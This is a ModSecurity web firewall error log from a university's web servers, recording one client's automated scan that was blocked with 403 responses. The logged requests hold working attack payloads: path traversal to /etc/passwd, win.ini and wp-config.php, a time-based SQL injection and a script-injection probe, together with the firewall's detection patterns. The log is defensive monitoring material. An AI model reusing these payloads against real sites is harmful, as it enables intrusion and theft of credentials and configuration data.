[Tue Aug 29 11:48:33.435774 2023] [:error] [pid 2362] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAk6PBsAAAAh"]
[Tue Aug 29 11:48:33.437940 2023] [:error] [pid 2375] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAlHQoYAAAAm"]
[Tue Aug 29 11:48:33.457553 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAj12HYAAAAa"]
[Tue Aug 29 11:48:34.419484 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14osCo-f0AAAlUldcAAAA0"]
[Tue Aug 29 11:48:35.349045 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAj12HkAAAAa"]
[Tue Aug 29 11:48:35.353266 2023] [:error] [pid 2349] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAktzF0AAAAP"]
[Tue Aug 29 11:48:35.355316 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAlJmaYAAAAo"]
[Tue Aug 29 11:48:35.359304 2023] [:error] [pid 2362] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAk6PCAAAAAh"]
[Tue Aug 29 11:48:35.369165 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAkAMIsAAAAU"]
[Tue Aug 29 11:48:35.382145 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlV8BMAAAA1"]
[Tue Aug 29 11:48:35.404097 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAklezIAAAAD"]
[Tue Aug 29 11:48:35.425186 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlUldwAAAA0"]
[Tue Aug 29 11:48:35.436560 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlFH5oAAAAk"]
[Tue Aug 29 11:48:35.440649 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAkAMI4AAAAU"]
[Tue Aug 29 11:48:36.368701 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pMCo-f0AAAk2KXIAAAAb"]
[Tue Aug 29 11:48:36.414449 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14pMCo-f0AAAlJmakAAAAo"]
[Tue Aug 29 11:48:36.446471 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14pMCo-f0AAAlM8iEAAAAs"]
[Tue Aug 29 11:48:37.360442 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAlV8BkAAAA1"]
[Tue Aug 29 11:48:37.370771 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAlQ3qgAAAAw"]
[Tue Aug 29 11:48:37.385492 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAlL7BQAAAAq"]
[Tue Aug 29 11:48:37.389226 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAklezgAAAAD"]
[Tue Aug 29 11:48:37.393896 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAkAMJMAAAAU"]
[Tue Aug 29 11:48:37.409795 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAk1w68AAAAY"]
[Tue Aug 29 11:48:37.413252 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAlQ3qoAAAAw"]
[Tue Aug 29 11:48:37.413364 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAjdQSMAAAAZ"]
[Tue Aug 29 11:48:37.427828 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAkwQSEAAAAS"]
[Tue Aug 29 11:48:38.361644 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14psCo-f0AAAk7QJwAAAAi"]
[Tue Aug 29 11:48:38.382009 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14psCo-f0AAAk5CfEAAAAg"]
[Tue Aug 29 11:48:38.383212 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAlFH6EAAAAk"]
[Tue Aug 29 11:48:38.403789 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAklezsAAAAD"]
